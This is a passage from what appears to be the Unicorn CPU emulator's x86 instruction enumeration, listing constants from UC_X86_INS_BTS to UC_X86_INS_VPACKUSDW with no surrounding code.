UC_X86_INS_BTS, UC_X86_INS_BZHI, UC_X86_INS_CALL, UC_X86_INS_CBW, UC_X86_INS_CDQ, UC_X86_INS_CDQE, UC_X86_INS_FCHS, UC_X86_INS_CLAC, UC_X86_INS_CLC, UC_X86_INS_CLD, UC_X86_INS_CLFLUSH, UC_X86_INS_CLFLUSHOPT, UC_X86_INS_CLGI, UC_X86_INS_CLI, UC_X86_INS_CLTS, UC_X86_INS_CLWB, UC_X86_INS_CMC, UC_X86_INS_CMOVA, UC_X86_INS_CMOVAE, UC_X86_INS_CMOVB, UC_X86_INS_CMOVBE, UC_X86_INS_FCMOVBE, UC_X86_INS_FCMOVB, UC_X86_INS_CMOVE, UC_X86_INS_FCMOVE, UC_X86_INS_CMOVG, UC_X86_INS_CMOVGE, UC_X86_INS_CMOVL, UC_X86_INS_CMOVLE, UC_X86_INS_FCMOVNBE, UC_X86_INS_FCMOVNB, UC_X86_INS_CMOVNE, UC_X86_INS_FCMOVNE, UC_X86_INS_CMOVNO, UC_X86_INS_CMOVNP, UC_X86_INS_FCMOVNU, UC_X86_INS_CMOVNS, UC_X86_INS_CMOVO, UC_X86_INS_CMOVP, UC_X86_INS_FCMOVU, UC_X86_INS_CMOVS, UC_X86_INS_CMP, UC_X86_INS_CMPPD, UC_X86_INS_CMPPS, UC_X86_INS_CMPSB, UC_X86_INS_CMPSD, UC_X86_INS_CMPSQ, UC_X86_INS_CMPSS, UC_X86_INS_CMPSW, UC_X86_INS_CMPXCHG16B, UC_X86_INS_CMPXCHG, UC_X86_INS_CMPXCHG8B, UC_X86_INS_COMISD, UC_X86_INS_COMISS, UC_X86_INS_FCOMP, UC_X86_INS_FCOMPI, UC_X86_INS_FCOMI, UC_X86_INS_FCOM, UC_X86_INS_FCOS, UC_X86_INS_CPUID, UC_X86_INS_CQO, UC_X86_INS_CRC32, UC_X86_INS_CVTDQ2PD, UC_X86_INS_CVTDQ2PS, UC_X86_INS_CVTPD2DQ, UC_X86_INS_CVTPD2PS, UC_X86_INS_CVTPS2DQ, UC_X86_INS_CVTPS2PD, UC_X86_INS_CVTSD2SI, UC_X86_INS_CVTSD2SS, UC_X86_INS_CVTSI2SD, UC_X86_INS_CVTSI2SS, UC_X86_INS_CVTSS2SD, UC_X86_INS_CVTSS2SI, UC_X86_INS_CVTTPD2DQ, UC_X86_INS_CVTTPS2DQ, UC_X86_INS_CVTTSD2SI, UC_X86_INS_CVTTSS2SI, UC_X86_INS_CWD, UC_X86_INS_CWDE, UC_X86_INS_DAA, UC_X86_INS_DAS, UC_X86_INS_DATA16, UC_X86_INS_DEC, UC_X86_INS_DIV, UC_X86_INS_DIVPD, UC_X86_INS_DIVPS, UC_X86_INS_FDIVR, UC_X86_INS_FIDIVR, UC_X86_INS_FDIVRP, UC_X86_INS_DIVSD, 
UC_X86_INS_DIVSS, UC_X86_INS_FDIV, UC_X86_INS_FIDIV, UC_X86_INS_FDIVP, UC_X86_INS_DPPD, UC_X86_INS_DPPS, UC_X86_INS_RET, UC_X86_INS_ENCLS, UC_X86_INS_ENCLU, UC_X86_INS_ENTER, UC_X86_INS_EXTRACTPS, UC_X86_INS_EXTRQ, UC_X86_INS_F2XM1, UC_X86_INS_LCALL, UC_X86_INS_LJMP, UC_X86_INS_FBLD, UC_X86_INS_FBSTP, UC_X86_INS_FCOMPP, UC_X86_INS_FDECSTP, UC_X86_INS_FEMMS, UC_X86_INS_FFREE, UC_X86_INS_FICOM, UC_X86_INS_FICOMP, UC_X86_INS_FINCSTP, UC_X86_INS_FLDCW, UC_X86_INS_FLDENV, UC_X86_INS_FLDL2E, UC_X86_INS_FLDL2T, UC_X86_INS_FLDLG2, UC_X86_INS_FLDLN2, UC_X86_INS_FLDPI, UC_X86_INS_FNCLEX, UC_X86_INS_FNINIT, UC_X86_INS_FNOP, UC_X86_INS_FNSTCW, UC_X86_INS_FNSTSW, UC_X86_INS_FPATAN, UC_X86_INS_FPREM, UC_X86_INS_FPREM1, UC_X86_INS_FPTAN, UC_X86_INS_FFREEP, UC_X86_INS_FRNDINT, UC_X86_INS_FRSTOR, UC_X86_INS_FNSAVE, UC_X86_INS_FSCALE, UC_X86_INS_FSETPM, UC_X86_INS_FSINCOS, UC_X86_INS_FNSTENV, UC_X86_INS_FXAM, UC_X86_INS_FXRSTOR, UC_X86_INS_FXRSTOR64, UC_X86_INS_FXSAVE, UC_X86_INS_FXSAVE64, UC_X86_INS_FXTRACT, UC_X86_INS_FYL2X, UC_X86_INS_FYL2XP1, UC_X86_INS_MOVAPD, UC_X86_INS_MOVAPS, UC_X86_INS_ORPD, UC_X86_INS_ORPS, UC_X86_INS_VMOVAPD, UC_X86_INS_VMOVAPS, UC_X86_INS_XORPD, UC_X86_INS_XORPS, UC_X86_INS_GETSEC, UC_X86_INS_HADDPD, UC_X86_INS_HADDPS, UC_X86_INS_HLT, UC_X86_INS_HSUBPD, UC_X86_INS_HSUBPS, UC_X86_INS_IDIV, UC_X86_INS_FILD, UC_X86_INS_IMUL, UC_X86_INS_IN, UC_X86_INS_INC, UC_X86_INS_INSB, UC_X86_INS_INSERTPS, UC_X86_INS_INSERTQ, UC_X86_INS_INSD, UC_X86_INS_INSW, UC_X86_INS_INT, UC_X86_INS_INT1, UC_X86_INS_INT3, UC_X86_INS_INTO, UC_X86_INS_INVD, UC_X86_INS_INVEPT, UC_X86_INS_INVLPG, UC_X86_INS_INVLPGA, UC_X86_INS_INVPCID, UC_X86_INS_INVVPID, UC_X86_INS_IRET, UC_X86_INS_IRETD, UC_X86_INS_IRETQ, UC_X86_INS_FISTTP, UC_X86_INS_FIST, UC_X86_INS_FISTP, UC_X86_INS_UCOMISD, UC_X86_INS_UCOMISS, UC_X86_INS_VCOMISD, UC_X86_INS_VCOMISS, UC_X86_INS_VCVTSD2SS, UC_X86_INS_VCVTSI2SD, UC_X86_INS_VCVTSI2SS, UC_X86_INS_VCVTSS2SD, UC_X86_INS_VCVTTSD2SI, UC_X86_INS_VCVTTSD2USI, UC_X86_INS_VCVTTSS2SI, UC_X86_INS_VCVTTSS2USI, UC_X86_INS_VCVTUSI2SD, UC_X86_INS_VCVTUSI2SS, UC_X86_INS_VUCOMISD, UC_X86_INS_VUCOMISS, UC_X86_INS_JAE, UC_X86_INS_JA, UC_X86_INS_JBE, UC_X86_INS_JB, UC_X86_INS_JCXZ, UC_X86_INS_JECXZ, UC_X86_INS_JE, UC_X86_INS_JGE, UC_X86_INS_JG, UC_X86_INS_JLE, UC_X86_INS_JL, UC_X86_INS_JMP, UC_X86_INS_JNE, UC_X86_INS_JNO, UC_X86_INS_JNP, UC_X86_INS_JNS, UC_X86_INS_JO, UC_X86_INS_JP, UC_X86_INS_JRCXZ, UC_X86_INS_JS, UC_X86_INS_KANDB, UC_X86_INS_KANDD, UC_X86_INS_KANDNB, UC_X86_INS_KANDND, UC_X86_INS_KANDNQ, UC_X86_INS_KANDNW, UC_X86_INS_KANDQ, UC_X86_INS_KANDW, UC_X86_INS_KMOVB, UC_X86_INS_KMOVD, UC_X86_INS_KMOVQ, UC_X86_INS_KMOVW, UC_X86_INS_KNOTB, UC_X86_INS_KNOTD, UC_X86_INS_KNOTQ, UC_X86_INS_KNOTW, UC_X86_INS_KORB, UC_X86_INS_KORD, UC_X86_INS_KORQ, UC_X86_INS_KORTESTB, UC_X86_INS_KORTESTD, UC_X86_INS_KORTESTQ, UC_X86_INS_KORTESTW, UC_X86_INS_KORW, UC_X86_INS_KSHIFTLB, UC_X86_INS_KSHIFTLD, UC_X86_INS_KSHIFTLQ, UC_X86_INS_KSHIFTLW, UC_X86_INS_KSHIFTRB, UC_X86_INS_KSHIFTRD, UC_X86_INS_KSHIFTRQ, UC_X86_INS_KSHIFTRW, UC_X86_INS_KUNPCKBW, UC_X86_INS_KXNORB, UC_X86_INS_KXNORD, UC_X86_INS_KXNORQ, UC_X86_INS_KXNORW, UC_X86_INS_KXORB, UC_X86_INS_KXORD, UC_X86_INS_KXORQ, UC_X86_INS_KXORW, UC_X86_INS_LAHF, UC_X86_INS_LAR, UC_X86_INS_LDDQU, UC_X86_INS_LDMXCSR, UC_X86_INS_LDS, UC_X86_INS_FLDZ, UC_X86_INS_FLD1, UC_X86_INS_FLD, UC_X86_INS_LEA, UC_X86_INS_LEAVE, UC_X86_INS_LES, UC_X86_INS_LFENCE, UC_X86_INS_LFS, UC_X86_INS_LGDT, UC_X86_INS_LGS, UC_X86_INS_LIDT, UC_X86_INS_LLDT, UC_X86_INS_LMSW, UC_X86_INS_OR, UC_X86_INS_SUB, 
UC_X86_INS_XOR, UC_X86_INS_LODSB, UC_X86_INS_LODSD, UC_X86_INS_LODSQ, UC_X86_INS_LODSW, UC_X86_INS_LOOP, UC_X86_INS_LOOPE, UC_X86_INS_LOOPNE, UC_X86_INS_RETF, UC_X86_INS_RETFQ, UC_X86_INS_LSL, UC_X86_INS_LSS, UC_X86_INS_LTR, UC_X86_INS_XADD, UC_X86_INS_LZCNT, UC_X86_INS_MASKMOVDQU, UC_X86_INS_MAXPD, UC_X86_INS_MAXPS, UC_X86_INS_MAXSD, UC_X86_INS_MAXSS, UC_X86_INS_MFENCE, UC_X86_INS_MINPD, UC_X86_INS_MINPS, UC_X86_INS_MINSD, UC_X86_INS_MINSS, UC_X86_INS_CVTPD2PI, UC_X86_INS_CVTPI2PD, UC_X86_INS_CVTPI2PS, UC_X86_INS_CVTPS2PI, UC_X86_INS_CVTTPD2PI, UC_X86_INS_CVTTPS2PI, UC_X86_INS_EMMS, UC_X86_INS_MASKMOVQ, UC_X86_INS_MOVD, UC_X86_INS_MOVDQ2Q, UC_X86_INS_MOVNTQ, UC_X86_INS_MOVQ2DQ, UC_X86_INS_MOVQ, UC_X86_INS_PABSB, UC_X86_INS_PABSD, UC_X86_INS_PABSW, UC_X86_INS_PACKSSDW, UC_X86_INS_PACKSSWB, UC_X86_INS_PACKUSWB, UC_X86_INS_PADDB, UC_X86_INS_PADDD, UC_X86_INS_PADDQ, UC_X86_INS_PADDSB, UC_X86_INS_PADDSW, UC_X86_INS_PADDUSB, UC_X86_INS_PADDUSW, UC_X86_INS_PADDW, UC_X86_INS_PALIGNR, UC_X86_INS_PANDN, UC_X86_INS_PAND, UC_X86_INS_PAVGB, UC_X86_INS_PAVGW, UC_X86_INS_PCMPEQB, UC_X86_INS_PCMPEQD, UC_X86_INS_PCMPEQW, UC_X86_INS_PCMPGTB, UC_X86_INS_PCMPGTD, UC_X86_INS_PCMPGTW, UC_X86_INS_PEXTRW, UC_X86_INS_PHADDSW, UC_X86_INS_PHADDW, UC_X86_INS_PHADDD, UC_X86_INS_PHSUBD, UC_X86_INS_PHSUBSW, UC_X86_INS_PHSUBW, UC_X86_INS_PINSRW, UC_X86_INS_PMADDUBSW, UC_X86_INS_PMADDWD, UC_X86_INS_PMAXSW, UC_X86_INS_PMAXUB, UC_X86_INS_PMINSW, UC_X86_INS_PMINUB, UC_X86_INS_PMOVMSKB, UC_X86_INS_PMULHRSW, UC_X86_INS_PMULHUW, UC_X86_INS_PMULHW, UC_X86_INS_PMULLW, UC_X86_INS_PMULUDQ, UC_X86_INS_POR, UC_X86_INS_PSADBW, UC_X86_INS_PSHUFB, UC_X86_INS_PSHUFW, UC_X86_INS_PSIGNB, UC_X86_INS_PSIGND, UC_X86_INS_PSIGNW, UC_X86_INS_PSLLD, UC_X86_INS_PSLLQ, UC_X86_INS_PSLLW, UC_X86_INS_PSRAD, UC_X86_INS_PSRAW, UC_X86_INS_PSRLD, UC_X86_INS_PSRLQ, UC_X86_INS_PSRLW, UC_X86_INS_PSUBB, UC_X86_INS_PSUBD, UC_X86_INS_PSUBQ, UC_X86_INS_PSUBSB, UC_X86_INS_PSUBSW, UC_X86_INS_PSUBUSB, UC_X86_INS_PSUBUSW, UC_X86_INS_PSUBW, UC_X86_INS_PUNPCKHBW, UC_X86_INS_PUNPCKHDQ, UC_X86_INS_PUNPCKHWD, UC_X86_INS_PUNPCKLBW, UC_X86_INS_PUNPCKLDQ, UC_X86_INS_PUNPCKLWD, UC_X86_INS_PXOR, UC_X86_INS_MONITOR, UC_X86_INS_MONTMUL, UC_X86_INS_MOV, UC_X86_INS_MOVABS, UC_X86_INS_MOVBE, UC_X86_INS_MOVDDUP, UC_X86_INS_MOVDQA, UC_X86_INS_MOVDQU, UC_X86_INS_MOVHLPS, UC_X86_INS_MOVHPD, UC_X86_INS_MOVHPS, UC_X86_INS_MOVLHPS, UC_X86_INS_MOVLPD, UC_X86_INS_MOVLPS, UC_X86_INS_MOVMSKPD, UC_X86_INS_MOVMSKPS, UC_X86_INS_MOVNTDQA, UC_X86_INS_MOVNTDQ, UC_X86_INS_MOVNTI, UC_X86_INS_MOVNTPD, UC_X86_INS_MOVNTPS, UC_X86_INS_MOVNTSD, UC_X86_INS_MOVNTSS, UC_X86_INS_MOVSB, UC_X86_INS_MOVSD, UC_X86_INS_MOVSHDUP, UC_X86_INS_MOVSLDUP, UC_X86_INS_MOVSQ, UC_X86_INS_MOVSS, UC_X86_INS_MOVSW, UC_X86_INS_MOVSX, UC_X86_INS_MOVSXD, UC_X86_INS_MOVUPD, UC_X86_INS_MOVUPS, UC_X86_INS_MOVZX, UC_X86_INS_MPSADBW, UC_X86_INS_MUL, UC_X86_INS_MULPD, UC_X86_INS_MULPS, UC_X86_INS_MULSD, UC_X86_INS_MULSS, UC_X86_INS_MULX, UC_X86_INS_FMUL, UC_X86_INS_FIMUL, UC_X86_INS_FMULP, UC_X86_INS_MWAIT, UC_X86_INS_NEG, UC_X86_INS_NOP, UC_X86_INS_NOT, UC_X86_INS_OUT, UC_X86_INS_OUTSB, UC_X86_INS_OUTSD, UC_X86_INS_OUTSW, UC_X86_INS_PACKUSDW, UC_X86_INS_PAUSE, UC_X86_INS_PAVGUSB, UC_X86_INS_PBLENDVB, UC_X86_INS_PBLENDW, UC_X86_INS_PCLMULQDQ, UC_X86_INS_PCMPEQQ, UC_X86_INS_PCMPESTRI, UC_X86_INS_PCMPESTRM, UC_X86_INS_PCMPGTQ, UC_X86_INS_PCMPISTRI, UC_X86_INS_PCMPISTRM, UC_X86_INS_PCOMMIT, UC_X86_INS_PDEP, UC_X86_INS_PEXT, UC_X86_INS_PEXTRB, UC_X86_INS_PEXTRD, UC_X86_INS_PEXTRQ, UC_X86_INS_PF2ID, UC_X86_INS_PF2IW, UC_X86_INS_PFACC, 
UC_X86_INS_PFADD, UC_X86_INS_PFCMPEQ, UC_X86_INS_PFCMPGE, UC_X86_INS_PFCMPGT, UC_X86_INS_PFMAX, UC_X86_INS_PFMIN, UC_X86_INS_PFMUL, UC_X86_INS_PFNACC, UC_X86_INS_PFPNACC, UC_X86_INS_PFRCPIT1, UC_X86_INS_PFRCPIT2, UC_X86_INS_PFRCP, UC_X86_INS_PFRSQIT1, UC_X86_INS_PFRSQRT, UC_X86_INS_PFSUBR, UC_X86_INS_PFSUB, UC_X86_INS_PHMINPOSUW, UC_X86_INS_PI2FD, UC_X86_INS_PI2FW, UC_X86_INS_PINSRB, UC_X86_INS_PINSRD, UC_X86_INS_PINSRQ, UC_X86_INS_PMAXSB, UC_X86_INS_PMAXSD, UC_X86_INS_PMAXUD, UC_X86_INS_PMAXUW, UC_X86_INS_PMINSB, UC_X86_INS_PMINSD, UC_X86_INS_PMINUD, UC_X86_INS_PMINUW, UC_X86_INS_PMOVSXBD, UC_X86_INS_PMOVSXBQ, UC_X86_INS_PMOVSXBW, UC_X86_INS_PMOVSXDQ, UC_X86_INS_PMOVSXWD, UC_X86_INS_PMOVSXWQ, UC_X86_INS_PMOVZXBD, UC_X86_INS_PMOVZXBQ, UC_X86_INS_PMOVZXBW, UC_X86_INS_PMOVZXDQ, UC_X86_INS_PMOVZXWD, UC_X86_INS_PMOVZXWQ, UC_X86_INS_PMULDQ, UC_X86_INS_PMULHRW, UC_X86_INS_PMULLD, UC_X86_INS_POP, UC_X86_INS_POPAW, UC_X86_INS_POPAL, UC_X86_INS_POPCNT, UC_X86_INS_POPF, UC_X86_INS_POPFD, UC_X86_INS_POPFQ, UC_X86_INS_PREFETCH, UC_X86_INS_PREFETCHNTA, UC_X86_INS_PREFETCHT0, UC_X86_INS_PREFETCHT1, UC_X86_INS_PREFETCHT2, UC_X86_INS_PREFETCHW, UC_X86_INS_PSHUFD, UC_X86_INS_PSHUFHW, UC_X86_INS_PSHUFLW, UC_X86_INS_PSLLDQ, UC_X86_INS_PSRLDQ, UC_X86_INS_PSWAPD, UC_X86_INS_PTEST, UC_X86_INS_PUNPCKHQDQ, UC_X86_INS_PUNPCKLQDQ, UC_X86_INS_PUSH, UC_X86_INS_PUSHAW, UC_X86_INS_PUSHAL, UC_X86_INS_PUSHF, UC_X86_INS_PUSHFD, UC_X86_INS_PUSHFQ, UC_X86_INS_RCL, UC_X86_INS_RCPPS, UC_X86_INS_RCPSS, UC_X86_INS_RCR, UC_X86_INS_RDFSBASE, UC_X86_INS_RDGSBASE, UC_X86_INS_RDMSR, UC_X86_INS_RDPMC, UC_X86_INS_RDRAND, UC_X86_INS_RDSEED, UC_X86_INS_RDTSC, UC_X86_INS_RDTSCP, UC_X86_INS_ROL, UC_X86_INS_ROR, UC_X86_INS_RORX, UC_X86_INS_ROUNDPD, UC_X86_INS_ROUNDPS, UC_X86_INS_ROUNDSD, UC_X86_INS_ROUNDSS, UC_X86_INS_RSM, UC_X86_INS_RSQRTPS, UC_X86_INS_RSQRTSS, UC_X86_INS_SAHF, UC_X86_INS_SAL, UC_X86_INS_SALC, UC_X86_INS_SAR, UC_X86_INS_SARX, UC_X86_INS_SBB, UC_X86_INS_SCASB, UC_X86_INS_SCASD, UC_X86_INS_SCASQ, UC_X86_INS_SCASW, UC_X86_INS_SETAE, UC_X86_INS_SETA, UC_X86_INS_SETBE, UC_X86_INS_SETB, UC_X86_INS_SETE, UC_X86_INS_SETGE, UC_X86_INS_SETG, UC_X86_INS_SETLE, UC_X86_INS_SETL, UC_X86_INS_SETNE, UC_X86_INS_SETNO, UC_X86_INS_SETNP, UC_X86_INS_SETNS, UC_X86_INS_SETO, UC_X86_INS_SETP, UC_X86_INS_SETS, UC_X86_INS_SFENCE, UC_X86_INS_SGDT, UC_X86_INS_SHA1MSG1, UC_X86_INS_SHA1MSG2, UC_X86_INS_SHA1NEXTE, UC_X86_INS_SHA1RNDS4, UC_X86_INS_SHA256MSG1, UC_X86_INS_SHA256MSG2, UC_X86_INS_SHA256RNDS2, UC_X86_INS_SHL, UC_X86_INS_SHLD, UC_X86_INS_SHLX, UC_X86_INS_SHR, UC_X86_INS_SHRD, UC_X86_INS_SHRX, UC_X86_INS_SHUFPD, UC_X86_INS_SHUFPS, UC_X86_INS_SIDT, UC_X86_INS_FSIN, UC_X86_INS_SKINIT, UC_X86_INS_SLDT, UC_X86_INS_SMSW, UC_X86_INS_SQRTPD, UC_X86_INS_SQRTPS, UC_X86_INS_SQRTSD, UC_X86_INS_SQRTSS, UC_X86_INS_FSQRT, UC_X86_INS_STAC, UC_X86_INS_STC, UC_X86_INS_STD, UC_X86_INS_STGI, UC_X86_INS_STI, UC_X86_INS_STMXCSR, UC_X86_INS_STOSB, UC_X86_INS_STOSD, UC_X86_INS_STOSQ, UC_X86_INS_STOSW, UC_X86_INS_STR, UC_X86_INS_FST, UC_X86_INS_FSTP, UC_X86_INS_FSTPNCE, UC_X86_INS_FXCH, UC_X86_INS_SUBPD, UC_X86_INS_SUBPS, UC_X86_INS_FSUBR, UC_X86_INS_FISUBR, UC_X86_INS_FSUBRP, UC_X86_INS_SUBSD, UC_X86_INS_SUBSS, UC_X86_INS_FSUB, UC_X86_INS_FISUB, UC_X86_INS_FSUBP, UC_X86_INS_SWAPGS, UC_X86_INS_SYSCALL, UC_X86_INS_SYSENTER, UC_X86_INS_SYSEXIT, UC_X86_INS_SYSRET, UC_X86_INS_T1MSKC, UC_X86_INS_TEST, UC_X86_INS_UD2, UC_X86_INS_FTST, UC_X86_INS_TZCNT, UC_X86_INS_TZMSK, UC_X86_INS_FUCOMPI, UC_X86_INS_FUCOMI, UC_X86_INS_FUCOMPP, UC_X86_INS_FUCOMP, UC_X86_INS_FUCOM, 
UC_X86_INS_UD2B, UC_X86_INS_UNPCKHPD, UC_X86_INS_UNPCKHPS, UC_X86_INS_UNPCKLPD, UC_X86_INS_UNPCKLPS, UC_X86_INS_VADDPD, UC_X86_INS_VADDPS, UC_X86_INS_VADDSD, UC_X86_INS_VADDSS, UC_X86_INS_VADDSUBPD, UC_X86_INS_VADDSUBPS, UC_X86_INS_VAESDECLAST, UC_X86_INS_VAESDEC, UC_X86_INS_VAESENCLAST, UC_X86_INS_VAESENC, UC_X86_INS_VAESIMC, UC_X86_INS_VAESKEYGENASSIST, UC_X86_INS_VALIGND, UC_X86_INS_VALIGNQ, UC_X86_INS_VANDNPD, UC_X86_INS_VANDNPS, UC_X86_INS_VANDPD, UC_X86_INS_VANDPS, UC_X86_INS_VBLENDMPD, UC_X86_INS_VBLENDMPS, UC_X86_INS_VBLENDPD, UC_X86_INS_VBLENDPS, UC_X86_INS_VBLENDVPD, UC_X86_INS_VBLENDVPS, UC_X86_INS_VBROADCASTF128, UC_X86_INS_VBROADCASTI32X4, UC_X86_INS_VBROADCASTI64X4, UC_X86_INS_VBROADCASTSD, UC_X86_INS_VBROADCASTSS, UC_X86_INS_VCMPPD, UC_X86_INS_VCMPPS, UC_X86_INS_VCMPSD, UC_X86_INS_VCMPSS, UC_X86_INS_VCOMPRESSPD, UC_X86_INS_VCOMPRESSPS, UC_X86_INS_VCVTDQ2PD, UC_X86_INS_VCVTDQ2PS, UC_X86_INS_VCVTPD2DQX, UC_X86_INS_VCVTPD2DQ, UC_X86_INS_VCVTPD2PSX, UC_X86_INS_VCVTPD2PS, UC_X86_INS_VCVTPD2UDQ, UC_X86_INS_VCVTPH2PS, UC_X86_INS_VCVTPS2DQ, UC_X86_INS_VCVTPS2PD, UC_X86_INS_VCVTPS2PH, UC_X86_INS_VCVTPS2UDQ, UC_X86_INS_VCVTSD2SI, UC_X86_INS_VCVTSD2USI, UC_X86_INS_VCVTSS2SI, UC_X86_INS_VCVTSS2USI, UC_X86_INS_VCVTTPD2DQX, UC_X86_INS_VCVTTPD2DQ, UC_X86_INS_VCVTTPD2UDQ, UC_X86_INS_VCVTTPS2DQ, UC_X86_INS_VCVTTPS2UDQ, UC_X86_INS_VCVTUDQ2PD, UC_X86_INS_VCVTUDQ2PS, UC_X86_INS_VDIVPD, UC_X86_INS_VDIVPS, UC_X86_INS_VDIVSD, UC_X86_INS_VDIVSS, UC_X86_INS_VDPPD, UC_X86_INS_VDPPS, UC_X86_INS_VERR, UC_X86_INS_VERW, UC_X86_INS_VEXP2PD, UC_X86_INS_VEXP2PS, UC_X86_INS_VEXPANDPD, UC_X86_INS_VEXPANDPS, UC_X86_INS_VEXTRACTF128, UC_X86_INS_VEXTRACTF32X4, UC_X86_INS_VEXTRACTF64X4, UC_X86_INS_VEXTRACTI128, UC_X86_INS_VEXTRACTI32X4, UC_X86_INS_VEXTRACTI64X4, UC_X86_INS_VEXTRACTPS, UC_X86_INS_VFMADD132PD, UC_X86_INS_VFMADD132PS, UC_X86_INS_VFMADDPD, UC_X86_INS_VFMADD213PD, UC_X86_INS_VFMADD231PD, UC_X86_INS_VFMADDPS, UC_X86_INS_VFMADD213PS, UC_X86_INS_VFMADD231PS, UC_X86_INS_VFMADDSD, UC_X86_INS_VFMADD213SD, UC_X86_INS_VFMADD132SD, UC_X86_INS_VFMADD231SD, UC_X86_INS_VFMADDSS, UC_X86_INS_VFMADD213SS, UC_X86_INS_VFMADD132SS, UC_X86_INS_VFMADD231SS, UC_X86_INS_VFMADDSUB132PD, UC_X86_INS_VFMADDSUB132PS, UC_X86_INS_VFMADDSUBPD, UC_X86_INS_VFMADDSUB213PD, UC_X86_INS_VFMADDSUB231PD, UC_X86_INS_VFMADDSUBPS, UC_X86_INS_VFMADDSUB213PS, UC_X86_INS_VFMADDSUB231PS, UC_X86_INS_VFMSUB132PD, UC_X86_INS_VFMSUB132PS, UC_X86_INS_VFMSUBADD132PD, UC_X86_INS_VFMSUBADD132PS, UC_X86_INS_VFMSUBADDPD, UC_X86_INS_VFMSUBADD213PD, UC_X86_INS_VFMSUBADD231PD, UC_X86_INS_VFMSUBADDPS, UC_X86_INS_VFMSUBADD213PS, UC_X86_INS_VFMSUBADD231PS, UC_X86_INS_VFMSUBPD, UC_X86_INS_VFMSUB213PD, UC_X86_INS_VFMSUB231PD, UC_X86_INS_VFMSUBPS, UC_X86_INS_VFMSUB213PS, UC_X86_INS_VFMSUB231PS, UC_X86_INS_VFMSUBSD, UC_X86_INS_VFMSUB213SD, UC_X86_INS_VFMSUB132SD, UC_X86_INS_VFMSUB231SD, UC_X86_INS_VFMSUBSS, UC_X86_INS_VFMSUB213SS, UC_X86_INS_VFMSUB132SS, UC_X86_INS_VFMSUB231SS, UC_X86_INS_VFNMADD132PD, UC_X86_INS_VFNMADD132PS, UC_X86_INS_VFNMADDPD, UC_X86_INS_VFNMADD213PD, UC_X86_INS_VFNMADD231PD, UC_X86_INS_VFNMADDPS, UC_X86_INS_VFNMADD213PS, UC_X86_INS_VFNMADD231PS, UC_X86_INS_VFNMADDSD, UC_X86_INS_VFNMADD213SD, UC_X86_INS_VFNMADD132SD, UC_X86_INS_VFNMADD231SD, UC_X86_INS_VFNMADDSS, UC_X86_INS_VFNMADD213SS, UC_X86_INS_VFNMADD132SS, UC_X86_INS_VFNMADD231SS, UC_X86_INS_VFNMSUB132PD, UC_X86_INS_VFNMSUB132PS, UC_X86_INS_VFNMSUBPD, UC_X86_INS_VFNMSUB213PD, UC_X86_INS_VFNMSUB231PD, UC_X86_INS_VFNMSUBPS, UC_X86_INS_VFNMSUB213PS, UC_X86_INS_VFNMSUB231PS, 
UC_X86_INS_VFNMSUBSD, UC_X86_INS_VFNMSUB213SD, UC_X86_INS_VFNMSUB132SD, UC_X86_INS_VFNMSUB231SD, UC_X86_INS_VFNMSUBSS, UC_X86_INS_VFNMSUB213SS, UC_X86_INS_VFNMSUB132SS, UC_X86_INS_VFNMSUB231SS, UC_X86_INS_VFRCZPD, UC_X86_INS_VFRCZPS, UC_X86_INS_VFRCZSD, UC_X86_INS_VFRCZSS, UC_X86_INS_VORPD, UC_X86_INS_VORPS, UC_X86_INS_VXORPD, UC_X86_INS_VXORPS, UC_X86_INS_VGATHERDPD, UC_X86_INS_VGATHERDPS, UC_X86_INS_VGATHERPF0DPD, UC_X86_INS_VGATHERPF0DPS, UC_X86_INS_VGATHERPF0QPD, UC_X86_INS_VGATHERPF0QPS, UC_X86_INS_VGATHERPF1DPD, UC_X86_INS_VGATHERPF1DPS, UC_X86_INS_VGATHERPF1QPD, UC_X86_INS_VGATHERPF1QPS, UC_X86_INS_VGATHERQPD, UC_X86_INS_VGATHERQPS, UC_X86_INS_VHADDPD, UC_X86_INS_VHADDPS, UC_X86_INS_VHSUBPD, UC_X86_INS_VHSUBPS, UC_X86_INS_VINSERTF128, UC_X86_INS_VINSERTF32X4, UC_X86_INS_VINSERTF32X8, UC_X86_INS_VINSERTF64X2, UC_X86_INS_VINSERTF64X4, UC_X86_INS_VINSERTI128, UC_X86_INS_VINSERTI32X4, UC_X86_INS_VINSERTI32X8, UC_X86_INS_VINSERTI64X2, UC_X86_INS_VINSERTI64X4, UC_X86_INS_VINSERTPS, UC_X86_INS_VLDDQU, UC_X86_INS_VLDMXCSR, UC_X86_INS_VMASKMOVDQU, UC_X86_INS_VMASKMOVPD, UC_X86_INS_VMASKMOVPS, UC_X86_INS_VMAXPD, UC_X86_INS_VMAXPS, UC_X86_INS_VMAXSD, UC_X86_INS_VMAXSS, UC_X86_INS_VMCALL, UC_X86_INS_VMCLEAR, UC_X86_INS_VMFUNC, UC_X86_INS_VMINPD, UC_X86_INS_VMINPS, UC_X86_INS_VMINSD, UC_X86_INS_VMINSS, UC_X86_INS_VMLAUNCH, UC_X86_INS_VMLOAD, UC_X86_INS_VMMCALL, UC_X86_INS_VMOVQ, UC_X86_INS_VMOVDDUP, UC_X86_INS_VMOVD, UC_X86_INS_VMOVDQA32, UC_X86_INS_VMOVDQA64, UC_X86_INS_VMOVDQA, UC_X86_INS_VMOVDQU16, UC_X86_INS_VMOVDQU32, UC_X86_INS_VMOVDQU64, UC_X86_INS_VMOVDQU8, UC_X86_INS_VMOVDQU, UC_X86_INS_VMOVHLPS, UC_X86_INS_VMOVHPD, UC_X86_INS_VMOVHPS, UC_X86_INS_VMOVLHPS, UC_X86_INS_VMOVLPD, UC_X86_INS_VMOVLPS, UC_X86_INS_VMOVMSKPD, UC_X86_INS_VMOVMSKPS, UC_X86_INS_VMOVNTDQA, UC_X86_INS_VMOVNTDQ, UC_X86_INS_VMOVNTPD, UC_X86_INS_VMOVNTPS, UC_X86_INS_VMOVSD, UC_X86_INS_VMOVSHDUP, UC_X86_INS_VMOVSLDUP, UC_X86_INS_VMOVSS, UC_X86_INS_VMOVUPD, UC_X86_INS_VMOVUPS, UC_X86_INS_VMPSADBW, UC_X86_INS_VMPTRLD, UC_X86_INS_VMPTRST, UC_X86_INS_VMREAD, UC_X86_INS_VMRESUME, UC_X86_INS_VMRUN, UC_X86_INS_VMSAVE, UC_X86_INS_VMULPD, UC_X86_INS_VMULPS, UC_X86_INS_VMULSD, UC_X86_INS_VMULSS, UC_X86_INS_VMWRITE, UC_X86_INS_VMXOFF, UC_X86_INS_VMXON, UC_X86_INS_VPABSB, UC_X86_INS_VPABSD, UC_X86_INS_VPABSQ, UC_X86_INS_VPABSW, UC_X86_INS_VPACKSSDW, UC_X86_INS_VPACKSSWB, UC_X86_INS_VPACKUSDW, 